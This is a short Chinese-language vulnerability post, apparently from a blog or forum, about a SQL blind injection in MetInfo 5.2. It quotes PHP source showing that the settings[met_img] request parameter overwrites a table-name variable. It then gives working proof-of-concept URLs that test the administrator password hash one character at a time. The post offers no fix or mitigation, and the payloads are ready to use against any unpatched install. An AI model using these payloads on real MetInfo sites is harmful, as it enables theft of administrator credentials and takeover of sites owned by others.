MetInfo最新版SQL盲注漏洞

MetInfo最新版SQL盲注漏洞,可盲注管理员信息。 D:\wamp\www\MetInfo5.2\img\img.php [php] [/php] 第7行$dbname可以覆盖此变量 http://localhost/case/?settings[met_img]=met_admin_table%20or%201=1 -- mt 来到文件 D:\wamp\www\MetInfo5.2\include\global\listmod.php [php] require_once substr(dirname(__FILE__), 0, -6).'common.inc.php'; require_once '../include/global/pseudo.php'; if($dbname!=$met_download&&$dbname!=$met_img&&$dbname!=$met_news&&$dbname!=$met_product){okinfo('../404.html');exit();} if($class_list[$class1]['module']>=100||($class1==0&&$class2==0&&$class3==0)){ if($search=="search"){ $search_module=$imgproduct=='product'?3:5; $query="select * from $met_column where module='$search_module' and (classtype=1 or releclass!=0) and lang='$lang' order by no_order ASC,id ASC"; $search_coloumn=$db->get_all($query); $class1=$search_coloumn[0]['id']; }else{ [/php] 接着进入数据库查询即可导致注入。 漏洞证明: 打开页面 http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(56)-- 1 -----返回空白 http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(55)-- 1 -----返回案例 通过返回的信息可以盲注出管理员信息。 mcc

发表评论